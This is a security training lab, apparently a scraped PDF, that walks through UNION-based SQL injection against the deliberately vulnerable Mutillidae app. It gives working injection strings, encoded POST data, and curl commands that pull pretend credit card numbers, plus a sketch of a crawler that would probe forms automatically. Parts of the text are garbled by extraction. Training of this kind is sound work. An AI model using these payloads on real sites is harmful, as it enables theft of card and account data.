Mutillidae - Lesson 8 - SQL Injection Union Exploit #1 PDF

12/4/2016 Mutillidae: Lesson 8: SQL Injection Union Exploit #1
ComputerSecurityStudent (CSS) [Login] [Join Now]
HOME UNIX WINDOWS SECURITY TOOLS FORENSICS SHOPPING GET STARTED CONTACT US
|SECURITY TOOLS >> Mutillidae Project >> Mutillidae 2.5.11 >> Current Page |Views:
5768

(Mutillidae: Lesson 8)

{ SQL Injection Union Exploit #1 } Help
ComputerSecurityStudent
pay for continued
research,
Section 0. Background Information resources & bandwidth

What is Mutillidae?
OWASP Mutillidae II is a free, open source, deliberately vulnerable webapplication
providing a target for websecurity enthusiast.
What is a SQL Injection?
SQL injection (also known as SQL fishing) is a technique often used to attack data
driven applications.
This is done by including portions of SQL statements in an entry field in an attempt
to get the website to pass a newly formed rogue SQL command to the database (e.g.,
dump the database contents to the attacker). SQL injection is a code injection
technique that exploits a security vulnerability in an application's software.
The vulnerability happens when user input is either incorrectly filtered for string
literal escape characters embedded in SQL statements or user input is not strongly
typed and unexpectedly executed. SQL injection is mostly known as an attack vector
for websites but can be used to attack any type of SQL database.
What is cURL?
cURL stands for "Client URL Request Library".
This is a command line tool for getting or sending files using URL syntax.
It supports a range of common Internet protocols, currently including HTTP, HTTPS,
FTP, FTPS, SCP, SFTP, TFTP, LDAP, LDAPS, DICT, TELNET, FILE, IMAP, POP3, SMTP and
RTSP.
(Damn Beautiful Tool in my opinion)
What is Burp Suite?
Burp Suite is a Java application that can be used to secure or crack web
applications. The suite consists of different tools, such as a proxy server, a web
spider, an intruder and a socalled repeater, with which requests can be automated.
When Burp suite is used as a proxy server and a web browser uses this proxy server,
it is possible to have control of all traffic that is exchanged between the web
browser and web servers. Burp makes it possible to manipulate data before it is sent
to the web server.
PreRequisite Lab
1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora 14
Note: Remote database access has been turned on to provide an additional
vulnerability.
2. BackTrack: Lesson 1: Installing BackTrack 5 R1
Note: This is not absolutely necessary, but if you are a computer security
student or professional, you should have a BackTrack VM.
Lab Notes
In this lab we will do the following:
1. Due to a purposely bug in the userinfo.php code, we will use a Union SQL
Injection to obtain nowasp application pretend credit card information.
2. We will use Burpsuite to capture the POST DATA string.
3. We will use curl to simulate web browsing without using a web browser.
4. We will use simple perl program to parse the curl results.
Legal Disclaimer
As a condition of your use of this Web site, you warrant to
computersecuritystudent.com that you will not use this Web site for any purpose that
is unlawful or that is prohibited by these terms, conditions, and notices.
In accordance with UCC § 2316, this product is provided with "no warranties, either
express or implied." The information contained is provided "asis", with "no
guarantee of merchantability."
In addition, this is a teaching website that does not condone malicious behavior of
any kind.
https://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson8/index.html 1/30
You are on notice, that continuing and/or using this lab outside your "own" test
environment is considered malicious and is against the law.
© 2013 No content replication of any kind is allowed without express written
permission.
Section 1: Configure Fedora14 Virtual Machine Settings
1. Start VMware Player
Instructions
1. For Windows 7
1. Click Start Button
2. Search for "vmware player"
3. Click VMware Player
2. For Windows XP
Starts > Programs > VMware Player
2. Edit Fedora Mutillidae Virtual Machine Settings
Instructions:
1. Highlight Fedora14 Mutillidae
2. Click Edit virtual machine settings
3. Edit Network Adapter
Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Click the OK Button
Section 2: Login to Fedora14 Mutillidae
1. Start Fedora14 VM Instance
Instructions:
1. Start Up VMWare Player
2. Select Fedora14 Mutillidae
3. Play virtual machine
2. Login to Fedora14 Mutillidae
Instructions:
1. Login: student
2. Password: <whatever you set it to>.
Section 3: Open Console Terminal and Retrieve IP Address
1. Start a Terminal Console
Instructions:
1. Applications > Terminal
2. Switch user to root
Instructions:
1. su root
2. <Whatever you set the root password to>
3. Get IP Address
Instructions:
1. ifconfig a
Notes (FYI):
As indicated below, my IP address is 192.168.1.111.
Please record your IP address.
Section 4: Configure BackTrack Virtual Machine Settings
1. Start VMware Player
Instructions
1. For Windows 7
1. Click Start Button
2. Search for "vmware player"
3. Click VMware Player
2. For Windows XP
Starts > Programs > VMware Player
2. Edit the BackTrack5R1 VM
Instructions:
1. Select BackTrack5R1 VM
2. Click Edit virtual machine settings
3. Edit Virtual Machine Settings
Instructions:
1. Click on Network Adapter
2. Click on the Bridged Radio button
3. Click on the OK Button
Section 5: Play and Login to BackTrack
1. Play the BackTrack5R1 VM
Instructions:
1. Click on the BackTrack5R1 VM
2. Click on Play virtual machine
2. Login to BackTrack
Instructions:
1. Login: root
2. Password: toor or <whatever you changed it to>.
3. Bring up the GNOME
Instructions:
1. Type startx
Section 6: Open Console Terminal and Retrieve IP Address
1. On BackTrack, Start up a terminal window
Instructions:
1. Click on the Terminal Window
2. Obtain the IP Address
Instructions:
1. ifconfig a
Note(FYI):
My IP address 192.168.1.109.
In your case, it will probably be different.
This is the machine that will be use to attack the victim machine
(Metasploitable).
Section 7: Database Union Explanation
1. On Fedora 14 Mutillidae
Notes (FYI):
Use your existing Terminal you opened in (Section 3, Step 1).
Instructions:
1. su root
2. mysql uroot psamurai
3. show databases;
4. use nowasp;
2. Show Tables
Instructions:
1. show tables;
Notes (FYI):
1. show tables, list all the tables in the particular DATABASE.
3. Show Tables
Instructions:
1. desc accounts;
2. desc credit_cards;
Notes (FYI):
1. desc accounts, show the accounts TABLE fields.
2. desc credit_cards, show the credit_cards TABLE fields.
4. Table Union
Instructions:
1. select * from accounts union select ccid,ccnumber,ccv,expira on,null from credit_cards;
Notes (FYI):
1. UNION is used to combine the result from multiple SELECT statements into a
single result set.
2. The UNION operator is ALSO used in SQL injections to join a query, purposely
forged by the tester, to the original query. The result of the forged query will
be joined to the result of the original query, allowing the tester to obtain the
values of fields of other tables.
3. We will later use this technique in (Section 14, Step 4).
Section 8: Start Web Browser Session to Mutillidae
1. On BackTrack, Open Firefox
Instructions:
1. Click on the Firefox Icon
Notes (FYI):
If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications >
Internet > Firefox Web Browser
2. Open Mutillidae
Notes (FYI):
Replace 192.168.1.111 in the following URL > http://192.168.1.111/mutillidae,
with your Mutillidae's IP Address obtained from (Section 3, Step 3)
Instructions:
1. http://192.168.1.111/mutillidae
Section 9: Go To User Info Page
1. Go to User Info
Instructions:
1. OWASP Top 10 ‐‐> A1 ‐ SQL Injec on ‐‐> SQLi ‐ Extract Data ‐‐> User Info
Section 10: Configure Firefox Proxy Settings
1. View Preferences
Instructions:
1. Edit > Preferences
2. Advanced Settings...
Instructions:
1. Click on the Advanced Icon
2. Click on the Network Tab
3. Click on the Setting... button
3. Connection Settings
Instructions:
1. Click on Manual proxy configurations
2. Type "127.0.0.1" in the HTTP Proxy Text Box
3. Type "8080" in the Port Text Box
4. Check Use the proxy server for all protocols
5. Click OK
6. Click Close
Section 11: Configure Burpsuite Settings
1. Start Burp Suite
Instructions:
1. Applications > BackTrack > Vulnerability Assessment > Web Application
Assessment > Web Vulnerability Proxies > burpsuite
2. JRE Message
Instructions:
1. Click OK
3. Configure proxy
Instructions:
1. Click on the proxy tab
2. Click on the options tab
3. Verify the port is set to 8080
4. Turn on intercept
Instructions:
1. Click on the proxy tab
2. Click on the intercept tab
3. Verify the intercept button shows "intercept is off"
Section 12: SQL Injection (Union Example #1)
1. Inspect the Name Textbox with Firebug
Instructions:
1. Right click on the Name Textbox
2. Click on Inspect Element
2. Change Text Box Size
Instructions:
1. After the string "size=", Change 20 to 100. (See Picture)
2. Click on the Close Button
3. First Union SQL Injection Attempt
Instructions:
1. In the Name Textbox place the following string. Remember to put a space after
the " ".
' union select null
2. Click the View Account Details button
Note(FYI):
1. Remember to put a space after the
4. SQL Error
Note(FYI):
1. Scroll down and notice the SQL Error.
2. Point #1, developers should never display MySQL and Debug statements in results.
3. Point #2, MySQL is actually telling us that we do not have the correct number of
column that match up with the union statement.
Instructions:
1. Read the Error Message.
2. Click the Back Arrow.
Instructions:
Instructions:
3. Second Union SQL Injection Attempt
Instructions:
the " ".
' union select null,null,null,null,null
Note(FYI):
1. In reality, we would not know that the accounts table has 5 fields without
sequentially adding a null value until you get back results without an error.
4. Viewing the Results
Note(FYI):
1. Scroll down and notice there is not an SQL error.
2. More importantly, notice application returned
username=
password=
signature=
3. At first glance this does not look like much. However, we established a
potential way to retrieve data from the database outside of the application's
original intent.
Instructions:
1. View the Results
Instructions:
Instructions:
Instructions:
the " ".
' union select 1,2,3,4,5
Note(FYI):
1. The goal with this union statement is to map out which fields in the database
align with the above numbers when the output is displayed.
Note(FYI):
1. Scroll down and notice that Username is populated with 2, Password is populated
with 3, and Signature is populated with 4.
Username=2
Password=3
Signature=4
2. So, we know that Username is the second table field, Password is the third table
field, and Signature is the forth table field.
Instructions:
1. View the Results
Instructions:
Instructions:
Instructions:
the " ".
' union select ccid,ccnumber,ccv,expira㚁�on,null from credit_cards ‐‐
Note(FYI):
1. The goal with this union statement is to map out which fields in the database
align with the above numbers when the output is displayed.
Note(FYI):
1. Scroll down and notice that Username is populated with a credit card number,
Password is populated with the CCV, and Signature is populated with the
expiration.
Username=4444111122223333
Password=745
Signature=20120301
2. Congrats, you successful manipulated a "purposeful" bug in the userinfo.php
script, to display credit card information using a query meant for the accounts
table.
Instructions:
1. View the Results
Section 16: SQL Injection (Union Example with Curl #5)
1. View Post Data (With Burp Suite)
Instructions:
1. Click on the Proxy Tab
2. Click on the History Tab
3. Scroll down to the bottom, and click on the line that contains >
/mu llidae/index.php?page=user‐info.php
4. Click on the Request Tab
5. Click on the Raw Tab
6. View the GET Data String
Later we will populate curl with this URL string.
Note(FYI):
/mu llidae/index.php?page=user‐
info.php&username=%27+union+select+ccid%2Cccnumber%2Cccv%2Cexpira on%2Cnull+from+credit_cards+‐‐
+&password=&user‐info‐php‐submit‐bu on=View+Account+Details
The encoded sql injec on ‐‐> %27+or+1%3D1‐‐+
1. %27 is a single quote (')
2. %2C is a comma (,)
3. + is a space
4. %3D is a equal sign (=)
2. Use Curl to Display Usernames and Passwords
Note(FYI):
I apologize ahead of time for the below mess. Match up the colors with the
explanations.
Replace 192.168.1.111 with Mutillidae's IP Address obtained from (Section 3,
Step 3).
Instructions:
1. Populate a BackTrack Terminal Windows with the below curl command.
curl ‐b crack_cookies.txt ‐c crack_cookies.txt ‐‐user‐agent "Mozilla/4.0 (compa ble; MSIE 5.01; Windows NT
5.0)" ‐‐data "page=user‐
info.php&username=%27+union+select+ccid%2Cccnumber%2Cccv%2Cexpira㚁�on%2Cnull+from+credit_cards+‐
‐+&password=&user‐info‐php‐submit‐bu酀�on=View+Account+Details" ‐‐loca on
"h酀�p://192.168.1.111/mu㚁�llidae/index.php" | grep ‐i "Username=" | awk 'BEGIN{FS="<"}{for (i=1; i<=NF; i++)
print $i}' | awk ‐F\> '{print $2}'
Note(FYI):
1. ‐‐data "page=user‐
info.php&username=%27+union+select+ccid%2Cccnumber%2Cccv%2Cexpira㚁�on%2Cnull+from+credit_cards+‐‐
+&password=&user‐info‐php‐submit‐bu酀�on=View+Account+Details"
This is the URL POST DATA string we obtained from (Sec on 14, Step 3).
2. ‐‐loca on "h酀�p://192.168.1.111/mu㚁�llidae/index.php"
This is the actual webpage script that handles the common gateway interface (CGI) between the web browser
and server.
3. awk 'BEGIN{FS="<"}{for (i=1; i<=NF; i++) print $i}'
Use the "<" character as a delimiter or ﬁeld separator and print each array element on a separate line
4. grep ‐i "Username="
Display lines that only have the string "Username=". Remember that the web output from (Sec on 11, Step 2)
contained "Username="
5. awk ‐F\> '{print $2}'
Use ">" as a delimiter and only print the output from the second ﬁeld.
Section 17: Perl Parser
1. Create Output File
Note(FYI):
Replace 192.168.1.111 with Mutillidae's IP Address obtained from (Section 3,
Step 3).
Instructions:
1. cd /root
2. curl ‐b crack_cookies.txt ‐c crack_cookies.txt ‐‐user‐agent "Mozilla/4.0 (compa ble; MSIE 5.01; Windows NT 5.0)" ‐‐
data "page=user‐
info.php&username=%27+union+select+ccid%2Cccnumber%2Cccv%2Cexpira on%2Cnull+from+credit_cards+‐‐
+&password=&user‐info‐php‐submit‐bu on=View+Account+Details" ‐‐loca on
"h p://192.168.1.111/mu llidae/index.php" | grep ‐i "Username=" > lesson8.txt
3. cat lesson8.txt
2. Download Output Parser
Instructions:
1. cd /root
2. wget http://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson8/lesson8.pl.TXT
3. mv lesson8.pl.TXT lesson8.pl
4. chmod 700 lesson8.pl
3. Run Perl Script
Instructions:
1. ./lesson8.pl
Note(FYI):
So lets put the pieces together. Imagine a web crawler that does nothing but
curl webpages for the string "form" that have this particular UNION
vulnerability. If the string "form" is found, then try a simple UNION SQL
injection like (' union null ). Then it would recursively append null to the
end of the union clause until, no more SQL errors are present.
Section 18: Restore Firefox Original Proxy Configurations
1. On BackTrack, Open Firefox
Instructions:
1. Click on the Firefox Icon
Notes (FYI):
If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications >
Internet > Firefox Web Browser
2. Firefox Preferences
Instructions:
1. Edit > Preferences
3. Advanced Settings...
Instructions:
1. Click on the Advanced Icon
2. Click on the Network Tab
3. Click on the Setting... button
4. Connection Settings
Instructions:
1. Click on the No proxy radio button
2. Click on the OK button
3. Click on the Close button
Section 19: Proof of Lab
1. Proof of Lab, (On a BackTrack Terminal)
Instructions:
1. cd /root
2. ls l lesson8.txt
3. ./lesson8.pl | head 3
4. date
5. echo "Your Name"
Replace the string "Your Name" with your actual name.
e.g., echo "John Gray"
Proof of Lab Instructions
1. Press both the <Ctrl> and <Alt> keys at the same time.
2. Do a <PrtScn>
3. Paste into a word document
4. Upload to Moodle

Mutillidae - Lesson 8 - SQL Injection Union Exploit #1 PDF

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Mutillidae - Lesson 8 - SQL Injection Union Exploit #1 PDF

Hochgeladen von

Copyright:

Verfügbare Formate

12/4/2016 Mutillidae: Lesson 8: SQL Injection Union Exploit #1

ComputerSecurityStudent (CSS) [Login] [Join Now]

HOME UNIX WINDOWS SECURITY TOOLS FORENSICS SHOPPING GET STARTED CONTACT US

Das könnte Ihnen auch gefallen